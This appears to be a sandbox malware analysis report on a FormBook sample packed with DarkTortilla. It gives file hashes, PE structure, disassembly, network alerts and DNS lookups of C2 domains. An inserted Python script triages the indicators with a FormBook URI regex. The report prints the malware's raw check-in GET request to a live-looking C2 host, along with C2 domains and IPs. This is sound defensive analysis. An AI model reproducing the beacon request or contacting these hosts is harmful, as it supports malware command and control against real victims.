Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

Process:C:\Windows\explorer.exe
File Type:data
Category:dropped
Size (bytes):107416
Entropy (8bit):4.001358683960633
Encrypted:false
SSDEEP:768:/l81knGFKqXWIjk0QsVWohLNzLxKNCjBlzTPieb6PR1vP0TgJd5m5oypQqW3/gB7:IkMKqTVWohDQeJBhOihGxnl5EFOPKSI
MD5:BFE555160AE823B8850B6278FB96C2FA
SHA1:EBFD3E91DE012D0EFD8BAFD437DD84256476FC11
SHA-256:787819813FAAF053C7F25C20236FB61FF89A269FD01DC131BF00D4E719168FAC
SHA-512:1BC8C3F601FD1144CC7B2299AF1A6165CCF8729DBE08529B128F98DB03151E1B874EEA96CBD55E8FC992ECF7E4D187AE06E0AF01AAD277B866738BB7344ED1AA
Malicious:false
Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

Process:C:\Windows\explorer.exe
File Type:JSON data
Category:dropped
Size (bytes):750
Entropy (8bit):5.168607461759352
Encrypted:false
SSDEEP:12:YWgc2XmcWEUdH+ucWEU1zdtmwDYyaH+2yrZMAdrKC8K/y8kEhq1HLxycXNNZ/TCh:Yzc2Wc4H7cuDFaHt0drc6hE14
MD5:89484D8093A982ECBB37A5CE39E33BD0
SHA1:9A940F3FDF273125A4AC94F324816D637BC9B832
SHA-256:4F46B87D2013949D3A34E45CADB8B9A74714CC5503084090BFD6C53840C5ED53
SHA-512:2060B613BB5995FFE54E0F1B8958D6C4E55DFCBCD4CD1CCD23EED2A072E6F123BB3D328D63E77E3440576997DC121413E0C4DFE094B04BEBCE2E789E4481E67A
Malicious:false
Preview:{"serviceContext":{"serviceActivityId":"2850ec61-2123-4343-9925-7250149d471e","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"2850ec61-2123-4343-9925-7250149d471e|2024-10-02T16:59:31.8062809Z|fabric_msn|EUS2-A|News_579"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

Process:C:\Users\user\Desktop\VFylJFPzqX.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):43008
Entropy (8bit):6.244941989510716
Encrypted:false
SSDEEP:384:ac3JOvwWj8Gpw0A67dOpRipKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+TsPZX:a4JU8g17dG6Iq8XMnVYqW2Xmh829ukc
MD5:9827FF3CDF4B83F9C86354606736CA9C
SHA1:E73D73F42BB2A310F03EB1BCBB22BE2B8EB7C723
SHA-256:C1CF3DC8FA1C7FC00F88E07AD539979B3706CA8D69223CFFD1D58BC8F521F63A
SHA-512:8261828D55F3B5134C0AEB98311C04E20C5395D4347251746F3BE0FB854F36CC7E118713CD00C9867537E6E47D5E71F2B2384FC00C67F0AE1B285B8310321579
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Win32.MalwareX-gen.10870.27618.exe, Detection: malicious
• Filename: q.bin.exe, Detection: malicious
• Filename: 5W69EF4IxU.lnk, Detection: malicious
• Filename: LisectAVT_2403002A_74.exe, Detection: malicious
• Filename: 10072024085940-0001 - HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: 0001.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: P1-635487.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: Order List Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      • Filename: order.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D>.]..............0..X...........w... ........@.. ..............................p.....`.................................Hw..O....... ............f...B...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..
                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):5.397522549586606
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                      File name:VFylJFPzqX.exe
                                                                                                                                                                                                                                      File size:1'085'440 bytes
                                                                                                                                                                                                                                      MD5:e9e768aa357a7e34348c69e41444964d
                                                                                                                                                                                                                                      SHA1:4930b85e20b7967cf0afb1d9ae9ae57ca4d373c9
                                                                                                                                                                                                                                      SHA256:acb23b92beb1de31d7175c94f94854887bc0b2adb90faddc89bf1b14b1bd1a4b
                                                                                                                                                                                                                                      SHA512:6394564277e7077d9e326cc0f34f3c6ef945ed4d2e6bd812daaef879bb957edd4c8032df14774328799c692cbfb1f784fbf3580e65effdc5d2d42f124f62bb3a
                                                                                                                                                                                                                                      SSDEEP:12288:LKLRCoZzl+CN6XYt8GjKtzp422BxYLWM7Wi9h77:LiCoZzkg8tzpH2BK17L9h77
                                                                                                                                                                                                                                      TLSH:13357A2632BB5BD0E878C3345620C03447F3ADC6E612C69E7DDD6E8F76E0A41566263E
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......+.........."...P..,...b.......J... ...`....@.. ....................................`................................
                                                                                                                                                                                                                                      Icon Hash:0731d0cc686d2907
                                                                                                                                                                                                                                      Entrypoint:0x4a4a8e
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x2B14AE88 [Thu Nov 26 11:01:28 1992 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa4a3c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa6000 | 0x65e98 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa2a94 | 0xa2c00 | 2c8878b6a7770b75bd5d97f107c5a6ab | False | 0.6624603974654378 | data | 6.889045730769205 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa6000 | 0x65e98 | 0x66000 | 1112cf484fce173e561906dde93d5e07 | False | 0.06840724571078431 | data | 1.81233093626148 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10c000 | 0xc | 0x200 | 55b3587c802a46f2e63fd73e61d924c2 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa62b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.42819148936170215
RT_ICON | 0xa6718 | 0x810 | Device independent bitmap graphic, 22 x 44 x 32, image size 2024 | | | 0.3444767441860465
RT_ICON | 0xa6f28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.31434426229508194
RT_ICON | 0xa78b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.25562851782363977
RT_ICON | 0xa8958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.17852697095435685
RT_ICON | 0xaaf00 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.13722248464808692
RT_ICON | 0xaf128 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.09717258776539836
RT_ICON | 0xb85d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.07516562167277889
RT_ICON | 0xc8df8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | | | 0.041630913986448505
RT_GROUP_ICON | 0x10ae20 | 0x84 | data | | | 0.7121212121212122
RT_VERSION | 0x10aea4 | 0x2ac | data | English | United States | 0.4722222222222222
RT_MANIFEST | 0x10b150 | 0xd48 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.38588235294117645
DLL | Import
mscoree.dll | _CorExeMain

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T18:58:51.666674+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49714 | 34.149.87.45 | 80 | TCP
2024-10-02T18:58:51.666674+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49714 | 34.149.87.45 | 80 | TCP
2024-10-02T18:58:51.666674+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49714 | 34.149.87.45 | 80 | TCP
2024-10-02T19:00:00.938230+0200 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49737 | 191.252.4.20 | 80 | TCP
2024-10-02T19:00:00.938230+0200 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49737 | 191.252.4.20 | 80 | TCP
2024-10-02T19:00:00.938230+0200 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.8 | 49737 | 191.252.4.20 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 18:58:51.133136988 CEST | 49714 | 80 | 192.168.2.8 | 34.149.87.45
Oct 2, 2024 18:58:51.139826059 CEST | 80 | 49714 | 34.149.87.45 | 192.168.2.8
Oct 2, 2024 18:58:51.139914036 CEST | 49714 | 80 | 192.168.2.8 | 34.149.87.45
Oct 2, 2024 18:58:51.146128893 CEST | 49714 | 80 | 192.168.2.8 | 34.149.87.45
Oct 2, 2024 18:58:51.151036978 CEST | 80 | 49714 | 34.149.87.45 | 192.168.2.8
Oct 2, 2024 18:58:51.661258936 CEST | 49714 | 80 | 192.168.2.8 | 34.149.87.45
Oct 2, 2024 18:58:51.666621923 CEST | 80 | 49714 | 34.149.87.45 | 192.168.2.8
Oct 2, 2024 18:58:51.666673899 CEST | 49714 | 80 | 192.168.2.8 | 34.149.87.45
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 18:58:31.495424032 CEST | 62059 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:58:31.535571098 CEST | 53 | 62059 | 1.1.1.1 | 192.168.2.8
Oct 2, 2024 18:58:50.911986113 CEST | 60009 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:58:51.129949093 CEST | 53 | 60009 | 1.1.1.1 | 192.168.2.8
Oct 2, 2024 18:59:10.912230015 CEST | 54236 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:59:10.922224045 CEST | 53 | 54236 | 1.1.1.1 | 192.168.2.8
Oct 2, 2024 18:59:31.072396994 CEST | 59558 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:59:36.899418116 CEST | 56126 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:59:37.148719072 CEST | 53 | 56126 | 1.1.1.1 | 192.168.2.8
Oct 2, 2024 18:59:54.247733116 CEST | 56745 | 53 | 192.168.2.8 | 1.1.1.1
Oct 2, 2024 18:59:55.088799000 CEST | 53 | 56745 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 18:58:31.495424032 CEST | 192.168.2.8 | 1.1.1.1 | 0xc2a3 | Standard query (0) | www.creatievecontentpeople.com | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:58:50.911986113 CEST | 192.168.2.8 | 1.1.1.1 | 0xe092 | Standard query (0) | www.mlharquitectura.com | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:10.912230015 CEST | 192.168.2.8 | 1.1.1.1 | 0x9599 | Standard query (0) | www.cargizmos.net | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:31.072396994 CEST | 192.168.2.8 | 1.1.1.1 | 0x513 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:36.899418116 CEST | 192.168.2.8 | 1.1.1.1 | 0x9736 | Standard query (0) | www.history-poker.site | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:54.247733116 CEST | 192.168.2.8 | 1.1.1.1 | 0x7c37 | Standard query (0) | www.brasilbikeshopsc.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 18:58:31.535571098 CEST | 1.1.1.1 | 192.168.2.8 | 0xc2a3 | Name error (3) | www.creatievecontentpeople.com | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:58:51.129949093 CEST | 1.1.1.1 | 192.168.2.8 | 0xe092 | No error (0) | www.mlharquitectura.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 18:58:51.129949093 CEST | 1.1.1.1 | 192.168.2.8 | 0xe092 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 18:58:51.129949093 CEST | 1.1.1.1 | 192.168.2.8 | 0xe092 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:10.922224045 CEST | 1.1.1.1 | 192.168.2.8 | 0x9599 | Name error (3) | www.cargizmos.net | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:31.079313040 CEST | 1.1.1.1 | 192.168.2.8 | 0x513 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 18:59:37.148719072 CEST | 1.1.1.1 | 192.168.2.8 | 0x9736 | Name error (3) | www.history-poker.site | none | none | A (IP address) | IN (0x0001) | false
Oct 2, 2024 18:59:55.088799000 CEST | 1.1.1.1 | 192.168.2.8 | 0x7c37 | No error (0) | www.brasilbikeshopsc.com | brasilbikeshopsc.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 18:59:55.088799000 CEST | 1.1.1.1 | 192.168.2.8 | 0x7c37 | No error (0) | brasilbikeshopsc.com | | 191.252.4.20 | A (IP address) | IN (0x0001) | false
• www.mlharquitectura.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 34.149.87.45 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 18:58:51.146128893 CEST | 168 | OUT | GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy&Rl=YTFLi4d0T2 HTTP/1.1
Host: www.mlharquitectura.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
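Read together, the DNS answers and the HTTP session above give the analyst three facts: which contacted names actually resolved (three are NXDOMAIN, and api.msn.com, a Microsoft domain, has no A record in the captured answers), which resolved name received the beacon (www.mlharquitectura.com, through two CNAMEs to 34.149.87.45, the destination of the explorer.exe session from PID 4084), and that the GET has the shape of a FormBook check-in: one short path segment and two short-key query parameters, the first carrying a long base64-like value. The script below is an added example and is not part of the Joe Sandbox report or its tooling. The DNS rows, the session tuple and the request bytes are transcribed from the report; the pipe-delimited row layout and the FORMBOOK_GET heuristic are this example's own assumptions, not a vendor signature.

```python
"""IOC triage for the DNS answers and the HTTP session from the report above."""
import re
from collections import defaultdict

# DNS answer rows transcribed from the report; the pipe-delimited layout is ours.
# Columns: timestamp|source|dest|txid|rcode|name|cname|address|type|class|doh
DNS_ANSWERS = """\
Oct 2, 2024 18:58:31.535571098 CEST|1.1.1.1|192.168.2.8|0xc2a3|Name error (3)|www.creatievecontentpeople.com|none|none|A (IP address)|IN (0x0001)|false
Oct 2, 2024 18:58:51.129949093 CEST|1.1.1.1|192.168.2.8|0xe092|No error (0)|www.mlharquitectura.com|cdn1.wixdns.net||CNAME (Canonical name)|IN (0x0001)|false
Oct 2, 2024 18:58:51.129949093 CEST|1.1.1.1|192.168.2.8|0xe092|No error (0)|cdn1.wixdns.net|td-ccm-neg-87-45.wixdns.net||CNAME (Canonical name)|IN (0x0001)|false
Oct 2, 2024 18:58:51.129949093 CEST|1.1.1.1|192.168.2.8|0xe092|No error (0)|td-ccm-neg-87-45.wixdns.net||34.149.87.45|A (IP address)|IN (0x0001)|false
Oct 2, 2024 18:59:10.922224045 CEST|1.1.1.1|192.168.2.8|0x9599|Name error (3)|www.cargizmos.net|none|none|A (IP address)|IN (0x0001)|false
Oct 2, 2024 18:59:31.079313040 CEST|1.1.1.1|192.168.2.8|0x513|No error (0)|api.msn.com|api-msn-com.a-0003.a-msedge.net||CNAME (Canonical name)|IN (0x0001)|false
Oct 2, 2024 18:59:37.148719072 CEST|1.1.1.1|192.168.2.8|0x9736|Name error (3)|www.history-poker.site|none|none|A (IP address)|IN (0x0001)|false
Oct 2, 2024 18:59:55.088799000 CEST|1.1.1.1|192.168.2.8|0x7c37|No error (0)|www.brasilbikeshopsc.com|brasilbikeshopsc.com||CNAME (Canonical name)|IN (0x0001)|false
Oct 2, 2024 18:59:55.088799000 CEST|1.1.1.1|192.168.2.8|0x7c37|No error (0)|brasilbikeshopsc.com||191.252.4.20|A (IP address)|IN (0x0001)|false
"""

# HTTP session transcribed from the report: explorer.exe (PID 4084) -> 34.149.87.45:80.
SESSION = {"src": "192.168.2.8", "sport": 49714, "dst": "34.149.87.45",
           "dport": 80, "pid": 4084, "process": r"C:\Windows\explorer.exe"}
HTTP_REQUEST = (
    "GET /igbn/?kDKH=K36gPXxmOtT7ZhgLXiyek6cbIzcBFal5uRZotzE1UqqTN+uoUurMQ0X06uvOZOdqSzHy"
    "&Rl=YTFLi4d0T2 HTTP/1.1\r\n"
    "Host: www.mlharquitectura.com\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Heuristic (this example's own assumption, not a vendor signature): one short
# lowercase path segment, then exactly two query parameters with short keys and
# a long base64-like first value, the shape FormBook check-in GETs take.
FORMBOOK_GET = re.compile(
    r"^/[a-z0-9]{2,8}/\?[A-Za-z0-9]{1,8}=[A-Za-z0-9+/=_-]{16,}&[A-Za-z0-9]{1,8}=[A-Za-z0-9+/=_-]{4,}$"
)


def parse_dns(text):
    """Split answer rows into NXDOMAIN names, a CNAME map and an A-record map."""
    nxdomain, cname, a_records = set(), {}, defaultdict(set)
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _src, _dst, _tid, rcode, name, target, addr, rtype, _cls, _doh = line.split("|")
        if rcode.startswith("Name error"):
            nxdomain.add(name)
        elif rtype.startswith("CNAME"):
            cname[name] = target
        elif rtype.startswith("A "):
            a_records[name].add(addr)
    return nxdomain, cname, a_records


def resolve(name, cname, a_records, max_hops=8):
    """Follow the CNAME chain from name; return (chain, ips). Hop-bounded against loops."""
    chain, current = [], name
    for _ in range(max_hops):
        chain.append(current)
        if current in a_records:
            return chain, set(a_records[current])
        if current not in cname:
            break
        current = cname[current]
    return chain, set()


def resolution_table(text):
    """Per name the sample queried (i.e. not merely a CNAME target): its outcome."""
    nxdomain, cname, a_records = parse_dns(text)
    queried = (set(cname) | set(a_records) | nxdomain) - set(cname.values())
    table = {}
    for name in sorted(queried):
        if name in nxdomain:
            table[name] = "NXDOMAIN"
            continue
        _chain, ips = resolve(name, cname, a_records)
        table[name] = ("RESOLVED " + ",".join(sorted(ips))) if ips else "NO A RECORD IN CAPTURE"
    return table


def parse_request(raw):
    """Minimal HTTP/1.1 request-line and header parser; the body is not needed here."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ")
    headers = {}
    for h in header_lines:
        key, _, value = h.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers


def triage(dns_text=DNS_ANSWERS, raw_request=HTTP_REQUEST, session=SESSION):
    """Tie the observed request back to the DNS data and score its URI shape."""
    nxdomain, cname, a_records = parse_dns(dns_text)
    method, target, headers = parse_request(raw_request)
    host = headers.get("host", "")
    chain, ips = resolve(host, cname, a_records)
    return {
        "beacon_host": host,
        "cname_chain": chain,
        "resolved_ips": sorted(ips),
        "session_dst_matches_host": session["dst"] in ips,
        "formbook_style_get": method == "GET" and FORMBOOK_GET.match(target) is not None,
        "beacon_process": f'{session["process"]} (PID {session["pid"]})',
        "unresolved_contacts": sorted(nxdomain),
    }


if __name__ == "__main__":
    for name, status in resolution_table(DNS_ANSWERS).items():
        print(f"{name:35} {status}")
    for key, value in triage().items():
        print(f"{key:26} {value}")
```

The hop bound in resolve matters on real captures, where a misconfigured or hostile zone can CNAME in a loop; the regex is deliberately narrow so that an ordinary CDN request with two parameters does not trip it, and it should be treated as a triage hint, not as proof of the family.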


Target ID: 0
Start time: 12:57:48
Start date: 02/10/2024
Path: C:\Users\user\Desktop\VFylJFPzqX.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\VFylJFPzqX.exe"
Imagebase: 0x90000
File size: 1'085'440 bytes
MD5 hash: E9E768AA357A7E34348C69E41444964D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1486863721.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1485081729.0000000003683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
